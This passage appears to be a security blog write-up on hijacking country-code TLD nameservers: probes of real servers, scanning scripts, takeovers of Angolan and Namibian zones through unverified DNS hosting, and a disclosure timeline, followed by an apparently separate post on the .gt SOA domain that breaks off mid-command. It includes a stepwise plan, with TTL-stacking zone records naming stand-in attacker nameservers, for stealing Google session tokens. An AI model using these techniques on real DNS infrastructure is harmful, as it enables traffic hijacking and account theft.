Looks like root has been away for a long time! Let’s take a look at one of the nameservers for Vietnam:

bash-3.2$ finger -l [email protected]
[203.119.60.105]
Login name: nobody                In real life: NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: noaccess              In real life: No Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: nobody4               In real life: SunOS 4.x NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: named                 In real life: User run named
Directory: /home/named                  Shell: /bin/false
Never logged in.
No unread mail
No Plan.
bash-3.2$ 
bash-3.2$ finger -l [email protected]
[203.119.60.105]
Login name: root                  In real life: Super-User
Directory: /                            Shell: /sbin/sh
Last login Tue Sep 30, 2014 on pts/1 from DNS-E
No unread mail
No Plan.

This one is more recent with a last login date for root of September 30, 2014. The fact that this protocol is installed on these nameservers likely indicates just how old these servers are.

Dynamic Websites

Probably the most common open nameserver port next to 53 was port 80 (HTTP). Some of the most interesting results came from simply visiting these websites. For example, one nameserver simply redirected me to an ad network:

* Rebuilt URL to: http://93.190.140.242/
*   Trying 93.190.140.242...
* Connected to 93.190.140.242 (93.190.140.242) port 80 (#0)
> GET / HTTP/1.1
> Host: 93.190.140.242
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
> 
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.10.1
< Date: Sun, 04 Jun 2017 03:16:30 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: close
< X-Powered-By: PHP/5.3.3
< Location: http://n158adserv.com/ads?key=6c6004f94a84a1d702c2b8dc16052e50&ch=140.242
< 
* Closing connection 0

I’m still unsure if this was a compromised nameserver or if the owner was just trying to make some extra money off of sketchy ads.

Other nameservers (such as one of the Albania nameservers for .com.al, .edu.al, .mil.al, .net.al, and .nic.al) returned various configuration pages which print verbose information about the machine they run on:

phpinfo_al.com_al.gov

The party wouldn’t be complete without the ability to run command-line utilities on the remote server (nameserver for .ke, .ba, and a handful of other extensions):

run_those_commands_bro

And much much more…

Additionally, there are many other fun services which I won’t go into too much detail on for brevity. Services like SMTP, IMAP, MySQL, SNMP, and RDP are not at all uncommon to find listening on various domain extension nameservers. Given the large attack surface of these services I would rate the chances of this route succeeding very highly; however, we won’t engage in any further testing given that we don’t want to act maliciously. Sadly, due to the sheer number of nameservers running outdated and insecure software, responsible disclosure to all owners would likely be an endless endeavor.

Checking for Expired TLD & Extension Nameserver Domain Names

This avenue was something I was fairly sure was going to be the route to victory, so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process is essentially to enumerate all nameserver hostnames for a given extension and then check to see if any of the base domains are expired and available for registration. The main issue I ran into is that many registries will tell you that a domain is totally available until you actually attempt to purchase it. Additionally, there were a few instances where a nameserver domain was expired but for some reason still unavailable for registration despite not being marked as reserved. This scanning led to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc.) but none in the actual TLD/domain extensions themselves.
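
A rough sketch of the enumeration side of that tooling is shown below (using Node’s dns module; the base-domain extraction is deliberately naive and the availability check is left as a stub, since in practice it requires a registrar/registry API plus an actual purchase attempt, as described above):

import { promises as dns } from "node:dns";

// Collect the base domains behind an extension's nameserver hostnames.
async function nameserverBaseDomains(extension: string): Promise<string[]> {
  const nsHosts = await dns.resolveNs(extension); // e.g. "io" -> ns-a1.io, a0.nic.io, ...
  const bases = nsHosts.map(host => {
    const labels = host.replace(/\.$/, "").split(".");
    return labels.slice(-2).join("."); // naive: ignores multi-label suffixes like .co.uk
  });
  return [...new Set(bases)];
}

// Stub: real availability checks need a registrar/registry API and, ultimately,
// an attempted purchase, since registries frequently misreport availability.
async function isRegistrable(domain: string): Promise<boolean> {
  return false;
}

nameserverBaseDomains("io").then(async bases => {
  for (const base of bases) {
    console.log(base, (await isRegistrable(base)) ? "POSSIBLY AVAILABLE" : "taken/unknown");
  }
});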

Examining Hosted TLD & Extension Nameservers for DNS Errors

One useful technique for finding vulnerabilities (even ones you didn’t know existed) is to scan for general DNS errors and misconfigurations and investigate the anomalies you find. One useful tool for this is ZoneMaster, a general DNS configuration scanner with tons and tons of tests for misconfigurations of nameservers/DNS. I tackled this approach by simply scripting up ZoneMaster scans for all of the domain extensions listed in the public suffix list. Poring over and grepping through the results led to some pretty interesting findings. One finding is listed in a previous blog post (in the country of Guatemala’s TLD .gt) and another is shown below.
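
The scripting involved is nothing fancy; a sketch of the approach is below (assuming the zonemaster-cli frontend is installed and on PATH and that a Node 18+ runtime provides global fetch; exact flags and output handling will vary by version):

import { execFile } from "node:child_process";
import { promisify } from "node:util";

const run = promisify(execFile);

// Scan every extension from the public suffix list with ZoneMaster and dump
// the raw output so it can be grepped for interesting errors later.
async function scanExtensions(): Promise<void> {
  const psl = await fetch("https://publicsuffix.org/list/public_suffix_list.dat")
    .then(res => res.text());
  const extensions = psl
    .split("\n")
    .map(line => line.trim())
    .filter(line => line && !line.startsWith("//") && !line.includes("*"));

  for (const ext of extensions) {
    try {
      const { stdout } = await run("zonemaster-cli", [ext]);
      console.log(`=== ${ext} ===\n${stdout}`);
    } catch (err) {
      console.error(`scan failed for ${ext}:`, err);
    }
  }
}

scanExtensions();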

Striking Paydirt – Finding Vulnerabilities Amongst the Errors

After scripting the ZoneMaster tool to automate scanning all of the TLD/domain extensions in the public suffix list, I found one particularly interesting result: one of the nameservers for the .co.ao extension was serving a DNS REFUSED error code when asked for the nameservers of the .co.ao zone:

dns_refused_co_ao

A quick verification with dig confirmed that this was indeed the case:

$ dig NS co.ao @ns01.backupdns.com.

; <<>> DiG 9.8.3-P1 <<>> NS co.ao @ns01.backupdns.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 21693
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;co.ao.                IN    NS

;; Query time: 89 msec
;; SERVER: 199.242.242.199#53(199.242.242.199)
;; WHEN: Thu Feb  9 21:57:35 2017
;; MSG SIZE  rcvd: 23

The nameserver in question, ns01.backupdns.com, appeared to be run by a third party DNS hosting service called Backup DNS:

backupdns_homepage

After some examination of this site it appeared to be a fairly aged DNS hosting service with an emphasis on hosting backup DNS servers in case of a failure on the primary nameserver. What piqued my interest was the DNS error code REFUSED, which is commonly used as a response when the nameserver simply does not have a zone stored for the specified domain (in this case the .co.ao domain). This is dangerous because hosted DNS providers will often allow DNS zones to be set up by any account with no verification of domain name ownership, meaning that anyone could create an account and a zone for .co.ao to potentially serve entirely new records.
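
Checking for this condition at scale is straightforward; here is a sketch (again with Node’s dns module) that flags nameservers answering REFUSED for a zone they are delegated for:

import { promises as dns } from "node:dns";

// Flag a delegated nameserver that refuses queries for its zone -- a hint
// that a hosted provider has no zone loaded and might let anyone claim it.
async function checkRefused(zone: string, nsHost: string): Promise<void> {
  const [ip] = await dns.resolve4(nsHost); // Resolver.setServers() wants an IP
  const resolver = new dns.Resolver();
  resolver.setServers([ip]);
  try {
    await resolver.resolveNs(zone);
    console.log(`${nsHost}: answered normally for ${zone}`);
  } catch (err: any) {
    if (err.code === "EREFUSED") {
      console.log(`${nsHost}: REFUSED for ${zone} -- investigate for takeover`);
    } else {
      console.log(`${nsHost}: ${err.code} for ${zone}`);
    }
  }
}

checkRefused("co.ao", "ns01.backupdns.com");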

Interested in seeing if this was possible, I created an account on the website and turned to their documentation page:

backupdns_documentation

Given the name of the site, the setup instructions made sense. In order to create the .co.ao zone I first had to add it to my account via the domain management panel:

adding_co_ao_to_account

This worked without any verification but there was still no zone data loaded for that particular zone. The next steps were to set up a BIND server on a remote host and configure it to be an authoritative nameserver for the .co.ao zone. Additionally, the server had to be configured to allow zone transfers from the BackupDNS nameserver so that the zone data could be copied over. The following diagrams show this process in action:

axfr_backupdns_1

We start with our Master DNS Server (in this case a BIND server set up in AWS) and the target BackupDNS nameserver we want our zone to be copied into.

axfr_backupdns_2

On a regular interval the BackupDNS nameserver will issue a zone transfer request (the AXFR DNS query). This is basically the nameserver asking “Can I have a copy of all the DNS data you have for .co.ao?”.

axfr_backupdns_3

Since we’ve configured our master nameserver to allow zone transfers from the BackupDNS nameserver via the allow-transfer configuration in BIND the request is granted and the zone data is copied over. We have now created the proper .co.ao zone in the BackupDNS service!

Ok, so I’d like to pause for just a moment and point out that at this point, I really wasn’t thinking that this would work. This wasn’t the first time I’d tested for issues like this with various nameservers, and previous attempts had ended unsuccessfully. That being said, just in case it did work, the zone I copied over was intentionally made with records that had a TTL of 1 second and an SOA record of only 60 seconds. This means that the records would be thrown out of the cache quickly and the DNS request would shortly be remade to another, legitimate nameserver for the extension. If you ever undertake any testing of this nature I highly recommend you do the same in order to minimize the caching of bad DNS responses for people trying to access the target legitimately.

It, of course, did work and the BackupDNS nameserver immediately began serving DNS traffic for .co.ao. After I saw the service confirm the copy I ran a quick dig query to verify:

$ dig NS google.co.ao @ns01.backupdns.com

; <<>> DiG 9.8.3-P1 <<>> NS google.co.ao @ns01.backupdns.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37564
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;google.co.ao.        IN    NS

;; AUTHORITY SECTION:
co.ao.        60    IN    SOA    root.co.ao. root.co.ao. 147297980 900 900 1800 60

;; Query time: 81 msec
;; SERVER: 199.242.242.199#53(199.242.242.199)
;; WHEN: Sun Feb 12 23:13:50 2017
;; MSG SIZE  rcvd: 83

Uh oh, that’s not good. I had originally placed a few NS records in the BIND zone file with the intention of delegating the DNS queries back to the legitimate nameservers, but I screwed up the BIND config and instead of replying with a DNS referral the server replied with an authoritative answer of NXDOMAIN. This is obviously not great, so I quickly deleted the zone from the BackupDNS service. Due to some annoying caching behavior of the BackupDNS service this took a few minutes longer than I would’ve liked, but soon enough the service was again returning REFUSED for all queries for .co.ao. Luckily this all took place at ~3:00 AM Angola time, which combined with the long TTL for the .co.ao TLD likely meant that very few users (if any) were actually impacted by the event.

Phew.

Despite the road bump this confirmed that the extension was indeed vulnerable. I then turned back to the scan results I had collected and found that not only was .co.ao vulnerable but .it.ao, nic.ao, and reg.it.ao were vulnerable as well! it.ao is another domain extension for the country of Angola which is commonly used for out-of-country entities. reg.it.ao is the organization that runs the .it.ao and .co.ao extensions.

Given the large impact that could occur if these extensions were hijacked maliciously, I decided to block other users from being able to add these zones to their own BackupDNS accounts. I added all the extensions to my own account but did not create any zone data for them; this ensured queries still returned the regular DNS errors with no results while preventing further exploitation:

ao_hijack_proof

After preventing immediate exploitation I then attempted to reach out to the owners of the .co.ao and .it.ao extensions. For more information on the disclosure process please see “Responsible Disclosure Timeline” below.

Hijacking a TLD – Compromising the .na TLD via WHOIS

While hijacking a nameserver for a domain extension is pretty useful for exploitation, there is a higher level of compromise that TLDs specifically can suffer from. Ownership of a TLD is outlined by the contacts listed on the WHOIS record which is hosted at the IANA Root Zone Database. As an attacker our main interest would be in getting the nameservers switched over to our own malicious nameservers so that we can serve up alternative DNS records for the TLD. IANA has a procedure for initiating this change for ccTLDs which can be found here. The important excerpt from this is the following:

The IANA staff will verify authorization/authenticity of the request and obtain confirmation from the listed TLD administrative and technical contacts that those contacts are aware of and in agreement with the requested changes. A minimum authentication of an exchange of e-mails with the e-mail addresses registered with the IANA is required.

The key note to make is that IANA will allow a nameserver change to be made for a TLD (just complete this form) if both the admin and technical contact on the WHOIS confirm via email that they want the change to occur.

In the interest of testing the security of this practice I enumerated all of the TLD WHOIS contact email address domains and used the TrustTrees script I wrote to look for any errors in the DNS configurations of these domains. After reading through pages of diagrams I found something interesting in the DNS for the .na TLD’s contact email domain (na-nic.com.na). The following is a diagram of the delegation paths for that domain:

na-nic.com.na_trust_tree_graph

The relevant section of this graph is the following:

zoomed-na-nic_com_na

As can be seen above, three nameservers for the domain all return fatal errors when queried. These nameservers, ns1.rapidswitch.com, ns2.rapidswitch.com and ns3.rapidswitch.com all belong to the managed DNS provider RapidSwitch. If we do a query in dig we can see the specific details of the error being returned:

$ dig NS na-nic.com.na @ns1.rapidswitch.com.

; <<>> DiG 9.8.3-P1 <<>> NS na-nic.com.na @ns1.rapidswitch.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 56285
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;na-nic.com.na.            IN    NS

;; Query time: 138 msec
;; SERVER: 2001:1b40:f000:41::4#53(2001:1b40:f000:41::4)
;; WHEN: Fri Jun  2 01:13:03 2017
;; MSG SIZE  rcvd: 31

The nameserver replies with a DNS REFUSED error code. Just as with the Angola domain extensions this error code can indicate that the domain is vulnerable to takeover if the managed DNS provider does not properly validate domains before users add them to their account. To investigate I created a RapidSwitch account and navigated to the “My Domains” portion of the website:

add_hosted_domain_button

The “My Domains” section contained an “Add Hosted Domain” button, which was exactly what I was looking for.

domain_added_banner_rapidswitch

By completing this process I was able to add the domain to my account without any ownership verification. It appeared that the only verification that occurs is a check to ensure that RapidSwitch is indeed listed as a nameserver for the specified domain.

Having the domain in my account was problematic because I then had to replicate the DNS setup of the original nameserver in order to prevent interruptions to the domain’s DNS (which hosts email, websites, etc for na-nic.com.na). Deleting the domain from my account would’ve made the domain vulnerable to takeover again so I had to clone the existing records as well.

Once the records were created I added some records for proof.na-nic.com.na in order to verify that I had indeed successfully hijacked the DNS for the domain. The following dig query shows the results:

$ dig ANY proof.na-nic.com.na @ns2.rapidswitch.com

; <<>> DiG 9.8.3-P1 <<>> ANY proof.na-nic.com.na @ns2.rapidswitch.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49573
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 4, ADDITIONAL: 4
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;proof.na-nic.com.na.        IN    ANY

;; ANSWER SECTION:
proof.na-nic.com.na.    300    IN    A    23.92.52.47
proof.na-nic.com.na.    300    IN    TXT    "mandatory was here"

;; AUTHORITY SECTION:
na-nic.com.na.        300    IN    NS    ns1.rapidswitch.com.
na-nic.com.na.        300    IN    NS    ns3.rapidswitch.com.
na-nic.com.na.        300    IN    NS    oshikoko.omadhina.net.
na-nic.com.na.        300    IN    NS    ns2.rapidswitch.com.

;; ADDITIONAL SECTION:
ns1.rapidswitch.com.    1200    IN    A    87.117.237.205
ns3.rapidswitch.com.    1200    IN    A    84.22.168.154
oshikoko.omadhina.net.    3600    IN    A    196.216.41.11
ns2.rapidswitch.com.    1200    IN    A    87.117.237.66

;; Query time: 722 msec
;; SERVER: 2001:1b40:f000:42::4#53(2001:1b40:f000:42::4)
;; WHEN: Sat Jun  3 17:33:59 2017
;; MSG SIZE  rcvd: 252

As can be seen above, the TXT record (and A record) is successfully returned, confirming the DNS hijacking issue. In a real world attack the final step would be to DDoS the remaining legitimate nameserver to eliminate competition for DNS responses (a step we obviously won’t be taking)*.

After this I reached out to the .na TLD contacts to report the vulnerability and get it fixed as soon as possible. For more information on this disclosure timeline see the “Responsible Disclosure Timeline” section below.

*There is one more issue with our attack plan, unlike *.it.ao and *.co.ao the na-nic.com.na domain has DNSSEC enabled. This is actually something that I didn’t even notice at first because my resolver doesn’t support DNSSEC. After trying it on a few different networks it appears that almost every resolver I used does not actually enforce DNSSEC properly (which surprised me quite a bit). After doing some more research it appears that global adoption is quite low for DNS resolvers which explains this behavior. So, depending on resolver configurations our attack may be complicated by this issue! We’ll discuss this further in the final conclusions section below. That being said, nice job to the admin setting it up!

The Impact of a TLD/Domain Extension Takeover

Universal Authentication & International Domains

Despite these vulnerabilities affecting extensions for the countries of Angola and Namibia, the effects reach much farther than just these countries. For example, many popular online services will have multiple homepages with domain extensions of the local country/area to give the site a more local feeling. Many of these sites will tie all of these homepages together with a universal authentication flow that automatically logs the user into any of the homepages despite them all being separate domains.

One example of this is Google which has search homepages with many extensions (here is a link which appears to have aggregated them all). One of these, of course, is google.co.ao:

google_co_ao

Another is google.com.na:

google-na

In order to provide a more seamless experience you can easily log yourself into any Google homepage (if you were already authenticated to Google on another homepage) by just clicking the blue button on the top right corner of the homepage. This button is just a link similar to the following:

https://accounts.google.com/ServiceLogin?hl=pt-PT&passive=true&continue=https://www.google.co.ao/%3Fgws_rd%3Dssl

Visiting this link will result in a 302 redirect to the following URL:

https://accounts.google.co.ao/accounts/SetSID?ssdc=1&sidt=[SESSION_TOKEN]&continue=https://www.google.co.ao/?gws_rd=ssl&pli=1

This passes a session token in the sidt parameter which logs you into the google.co.ao domain and allows the authentication to cross the domain/origin barrier.

What this means for exploitation, however, is that if you compromise any Google homepage domain extension (of which Google trusts approximately 200) then you can utilize the vulnerability to begin hijacking any Google account from any region. This is a bizarre threat model because it’s quite likely that you’d be able to exploit one of the 200 domain extension nameservers/registries before you could get a working Google account exploit in their standard set of services. After all, Google has a large security team full of people constantly auditing their infrastructure, whereas many TLDs and domain extensions are just run by random and often small organizations.

This is simplifying it quite a bit of course. In order to actually abuse a DNS hijacking vulnerability of this type you would have to complete the following steps (all in a stealthy manner as to not get caught too quickly):

  • Compromise a domain extension’s nameserver or registry to gain the ability to modify nameservers for your target’s website.
  • Begin returning new nameservers which you control for your target domain with an extremely long TTL (BIND’s resolver supports up to a week by default). This is important so that we can get cached in as many resolvers as possible, we also want to set a low TTL for the actual A record resolution for the google.co.ao/google.com.na sub-domains so that we can switch these over quickly when we want to strike.
  • Once we've heavily stacked the deck in our favor we must now get a valid SSL certificate for our google.co.ao/google.com.na domain name. This is one of the trickiest steps because certificate transparency can get us caught very quickly. The discussion around certificate transparency, and around getting a certificate without it being logged in certificate transparency logs, is a long one, but suffice it to say it's not going to be as easy as it once was.
  • We now set up multiple servers to host the malicious google.co.ao/google.com.na site with SSL enabled and switch all of the A record responses to point to our malicious servers. We then begin our campaign to get as many Google users as possible to visit the above link and give us their authentication tokens; depending on the goal this may be a more targeted campaign, etc. One nice part about this attack is that the victims don't even have to visit the URL: any tag request (e.g. anything that causes a GET request) will complete the 302 redirect and yield what we're looking for.
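
The TTL stacking mentioned in the second step might look something like the following zone records (the attacker nameserver names and IPs are made up purely for illustration):

; Delegation NS records served from the compromised co.ao zone use a very
; long TTL (one week) so they linger in resolver caches as long as possible:
google.co.ao.      604800  IN  NS  ns1.attacker-dns.example.
google.co.ao.      604800  IN  NS  ns2.attacker-dns.example.

; ...while the attacker-controlled zone keeps the A record TTL short so the
; answers can be flipped to the malicious servers at the moment of attack:
www.google.co.ao.      60  IN  A   203.0.113.10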

Widespread Effects – A Tangled Web

One other thing to consider is that not only are all *.co.ao, *.it.ao, and *.na domain names vulnerable to DNS hijacking, but anything that depends on these extensions may have become vulnerable as well. For example, other domains that utilize *.co.ao/*.it.ao/*.na nameserver hostnames can be poisoned by proxy (though glue records may make this tricky). Domains whose WHOIS contacts live under these extensions are also in danger, since those WHOIS contact addresses can be used to pull domains away from their owners and to have SSL certificates issued. Moving up the layers of the stack, things like HTTP resource includes on websites reveal just how entangled the web actually is.

Conclusions & Final Thoughts

I hope that I've made a convincing argument that the security of domain extensions/TLDs is not infallible. Keep in mind that even with all of these DNS tricks the easiest method is likely just to exploit a vulnerability in a service running on a domain extension's nameservers. I believe the following steps should be taken by Internet authorities and the wider community to better secure the DNS:

  • Require phone confirmation for high impact changes to TLDs in addition to the minimum requirement of email confirmation from the WHOIS contacts.
  • Set more strict requirements for TLD nameservers – limiting exposure of ports to just UDP/TCP port 53.
  • Perform continual automated auditing of TLD DNS and notify TLD operators upon detection of DNS errors.
  • Inform domain owners about the risks of buying into various domain extensions/TLDs and keep a record of past security incidents so that people can make an informed decision when purchasing their domains. Things like response times and time-to-resolution for alleged security incidents are important to track as well.
  • Raise greater awareness of DNSSEC and push DNS resolvers to support it. Adoption of DNSSEC is incredibly poor, and if it is implemented by both the domain and the resolver being used it can thwart some of these hijacking issues (assuming the attacker hasn't compromised the keys as well). Speaking from personal experience, I don't even notice DNSSEC failures because virtually no network (mobile, home, etc) that I use actually enforces it. I won't get into the longer arguments around DNSSEC as a whole, but suffice it to say it would definitely be an additional layer of protection against these attacks.

Given the political complications when it comes to ccTLDs, some of the enforcement of these policies is undoubtedly tricky. While I believe the above list would improve security, I also understand that actually ensuring these things happen is tough, especially with so many parties involved (it's always easier said than done). That being said, it's important to weigh the safety of the DNS against the appeasement of the parties involved. Given the incredibly large attack surface I'm surprised that compromise of TLDs/domain extensions isn't a more frequent event.

Responsible Disclosure Timeline

Angola *.it.ao & *.co.ao Takeover Disclosure

  • February 14, 2017: Reached out via reg.it.ao contact form requesting security contact and PGP key to report vulnerability.
  • February 15, 2017: Reply received with PGP ID specified and PGP encryption requested.
  • February 15, 2017: Sent full details of vulnerability in PGP-encrypted email.
  • February 21, 2017: Emailed Google security team about account takeover issue due to co.ao hijacking, advising they turn off universal homepage authentication flow for google.co.ao to prevent Google accounts from being hijacked.
  • February 22, 2017: Emailed BackupDNS owner requesting help to block these zones from being added to arbitrary BackupDNS accounts.
  • February 22, 2017: BackupDNS owner replies stating he will put a block in place which requires admin approval to add zones to user accounts.
  • February 22, 2017: Confirmed with BackupDNS owner that I am no longer able to add the zones to my account.
  • February 24, 2017: Received reply stating the problem has been fixed by removing BackupDNS's nameservers from the list of authoritative nameservers.

Namibia TLD *.na Takeover Disclosure

  • June 3, 2017: Emailed the contacts listed in the .na WHOIS record inquiring about the proper place to disclose a security vulnerability in the .na TLD's WHOIS contact email domains.
  • June 3, 2017: Received confirmation that the admin contact was the appropriate source to disclose this issue.
  • June 3, 2017: Disclosed the issue to the admin contact.
  • June 3, 2017: Vulnerability remediated by changing the nameservers for the na-nic.com.na domain and removing the RapidSwitch nameservers altogether.

Disclosure Note: This was an incredible turnaround time, with the issue being received and fixed in just a few hours. In situations such as these I expect the turnaround to be weeks to months, but due to the responsiveness of the operator this was remediated ASAP. Preventing all security issues isn't possible, but reacting quickly to the ones that do come up says a lot. Hats off to the DNS admin of the .na TLD!

[Photo] Guatemala City, by Rigostar (Own work) [CC BY-SA 3.0], via Wikimedia Commons.

UPDATE: Guatemala has now patched this issue after I reached out to their DNS administrator (and with a super quick turnaround as well!)

In search of new, interesting, high-impact DNS vulnerabilities I decided to take a look at the various top-level domains (TLDs) and analyze their configurations for errors. Upon some initial searching it turns out there is a nice open source tool called DNSCheck, written by The Internet Foundation in Sweden, which helps DNS administrators scan their domains for misconfigurations. This tool helps highlight all sorts of odd DNS misconfigurations, such as a mismatch between a domain's authoritative nameservers and the nameservers set at the parent TLD's nameservers (this was the issue causing the domain takeover vulnerabilities in iom.int and sen.gov covered in a previous post). While it doesn't explicitly point out vulnerabilities in these domains, it does let us know if something is misconfigured, which is as good a place as any to start.

As of the time of this writing there are ~1,519 top level domains. Instead of scanning each TLD one by one by hand I opted to write a script to automate scanning all of the TLDs. The results of this script can be found in my Github repo titled TLD Health Report. The script was designed to highlight which TLDs have the most serious misconfigurations. After spending an hour or two reviewing the TLDs with configuration errors I came across an interesting issue with the .gt TLD. The error can be seen on this Github page and is as follows:

SOA Scan

Errors:

  • No address found for maestro.gt. No IPv4 or IPv6 address was found for the host name.

Warnings:

  • Error while checking SOA MNAME for gt. (maestro.gt). The SOA MNAME is not a valid host name.

Notices:

  • SOA MNAME for gt. (maestro.gt) not listed as NS. The name server listed as the SOA MNAME is not listed as a name server.

…trimmed for brevity…

As can be seen from the above, multiple errors and warnings state that the domain name maestro.gt does not resolve and is an invalid primary master nameserver (MNAME) for the .gt TLD. We can see this configuration in action by running the following dig command:

mandatory ~/P/gtmaster> dig SOA randomdomain.gt

; <<>> DiG 9.8.3-P1 <<>> SOA randomdomain.gt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1444
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;randomdomain.gt.        IN    SOA

;; AUTHORITY SECTION:
gt.            0    IN    SOA    maestro.gt. alejandra.reynoso.cctld.gt. 2017012900 3600 600 604800 14400

;; Query time: 43 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sun Jan 29 16:11:57 2017
;; MSG SIZE  rcvd: 101

As can be seen above, we receive an NXDOMAIN error (because the domain we requested does not exist) and along with it we get a start of authority (SOA) record with maestro.gt listed as the master nameserver. Any request for a non-existent domain under the .gt TLD will return an SOA record with this domain in it.
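
A rough sketch of how one might hunt for this class of issue across every TLD (this is not the DNSCheck-based script mentioned earlier, just an illustration): pull the IANA TLD list, read each TLD's SOA MNAME, and flag any MNAME that doesn't resolve to an address. Whether an unresolvable MNAME is actually open for registration still has to be checked by hand.

# Flag TLDs whose SOA MNAME does not resolve to any IPv4/IPv6 address.
curl -s https://data.iana.org/TLD/tlds-alpha-by-domain.txt | grep -v '^#' |
tr -d '\r' | tr '[:upper:]' '[:lower:]' | while read -r tld; do
    mname=$(dig +short SOA "${tld}." | awk '{print $1}')
    [ -z "$mname" ] && continue
    addrs=$(dig +short A "$mname"; dig +short AAAA "$mname")
    if [ -z "$addrs" ]; then
        echo "${tld}: SOA MNAME ${mname} does not resolve"
    fi
done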

“Unresolvable” is Just Another Word for “Not Resolvable Yet”

If you've read some of the previous posts on DNS vulnerabilities that I've written you may have already guessed why this domain isn't resolving. It's because it doesn't exist! As it turns out, it's also open for registration. With a bit of searching and Google Translate I found that it was available for registration from the “Registro de Dominios .gt” for around $60 a year (with a minimum of two years of registration).

Would you believe they take Visa?

While pricey, the registration was quick and completely automated which is more than I can say for many other TLDs in Central America. The only drawback was that my debit card was immediately frozen for questionable activity and I had to go online to unfreeze it so that the order could go through:

Apparently buying a Guatemalan domain name at 1:30 AM is grounds for your card being frozen.

Listening for Noise

Due to the SOA MNAME being a somewhat esoteric feature of DNS I wasn't sure what to expect in terms of DNS traffic. It was unclear from casual Googling what types of DNS clients and services would actually make use of this field at all. For this reason I configured my BIND DNS server to answer all A record queries for any domain under .gt with the IP address of my server as a general catch-all. I set up tcpdump to dump all DNS traffic into a pcap file for later analysis and let the box sit overnight.
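
Roughly, the setup looked like this (a minimal sketch rather than my exact configuration; the file paths assume a stock Debian-style BIND install):

# Hypothetical catch-all zone file: answer every name under gt. with my IP.
cat > /etc/bind/db.gt-catchall <<'EOF'
$TTL 300
@        IN SOA maestro.gt. hostmaster.maestro.gt. ( 1 3600 600 604800 300 )
@        IN NS  maestro.gt.
maestro  IN A   52.15.155.128
*        IN A   52.15.155.128
EOF

# Hypothetical named.conf zone stanza loading it; dynamic updates are refused
# (BIND's default behavior when allow-update is not opened up).
cat >> /etc/bind/named.conf.local <<'EOF'
zone "gt" {
    type master;
    file "/etc/bind/db.gt-catchall";
    allow-update { none; };
};
EOF

# Dump all DNS traffic to a pcap file for later analysis:
tcpdump -i eth0 -w dns-traffic.pcap port 53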

What I found in the morning was far from expected: when I checked the pcap data I found that computers from all over the country of Guatemala were sending DNS queries to my server.

[Screenshot: Wireshark capture of the inbound DNS traffic]

What in the world is going on? Looking further into the results only appears to yield more confusion:

[Screenshot: an example DNS UPDATE query]

A majority of the traffic consisted of DNS UPDATE queries from internal network IP addresses. The above is an example DNS UPDATE request attempting to update the zone of my DNS server to include an SRV record for an internal LDAP server belonging to a random government network in Guatemala.

So, why all of the DNS queries? If you’re familiar with what _ldap._tcp.dc._msdcs is for then you may have already spotted the forest from the trees.

Understanding Windows Active Directory Domains

To understand why we are getting this traffic we have to take a quick diversion to learn about Windows Active Directory (AD) Domains and DDNS (Dynamic DNS).

Windows domains are structured in much the same way as Internet domain names. When creating a Windows domain you must specify a DNS suffix. This DNS suffix is comparable to a base domain, with all of the sub-domains being either child domains or simply hostnames of machines under the parent domain. As an example, say we have a Windows domain of thehackerblog.com and we have two Windows Active Directory (AD) networks under this parent domain: east and west. In this structure we would set up two domains under the parent domain of thehackerblog.com as east.thehackerblog.com and west.thehackerblog.com. If we had a dedicated web server for internal company documentation for the east office under this domain it might have a hostname of documentation.east.thehackerblog.com. In this way we build up a domain tree of our network, much as is done with the Internet's DNS. The following is our example network as a tree:

[Diagram: the example thehackerblog.com network tree]

These hostnames, like documentation.east.thehackerblog.com, allow computers and people to easily find each other in this network. The network's DNS server takes these human-readable hostnames and turns them into the IP addresses of the specific machines so that your computer knows where to request the information you're looking for. So when, for example, you type the internal website URL documentation.east.thehackerblog.com into your web browser, your computer asks the network's DNS server for the IP address of this hostname in order to find it and route traffic to it.

Given this structure a problem does arise. Since machine IP addresses can often change on these networks, what happens when the server behind documentation.east.thehackerblog.com suddenly has a change in IP (say due to a new DHCP lease, etc)? How can the network’s DNS servers figure out the new IP address of this machine?

Understanding Windows Dynamic Update

Windows Active Directory networks solve this problem by the use of something called Dynamic Update. Dynamic Update at its core is actually very simple. In order to keep records such as documentation.east.thehackerblog.com fresh and accurate, these servers will occasionally reach out to the network's DNS server and update their specific DNS records. For example, if the documentation.east.thehackerblog.com IP address suddenly changed, this server would reach out to the domain's DNS server and say “Hey! My IP changed, please update the documentation.east.thehackerblog.com record to point to my new IP so people know where I am!”. A real-world comparison would be a person moving apartments and having to notify their friends, workplace, and online shopping outlets of their new mailing address.
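
In DNS terms, that refresh is just a dynamic update message. A minimal sketch of the same operation done by hand with nsupdate, using the example names above and a made-up IP (a Windows client does the equivalent of this automatically when its address changes):

# Send a dynamic update for the example record by hand.
nsupdate <<'EOF'
server ns1.thehackerblog.com
zone east.thehackerblog.com
update delete documentation.east.thehackerblog.com A
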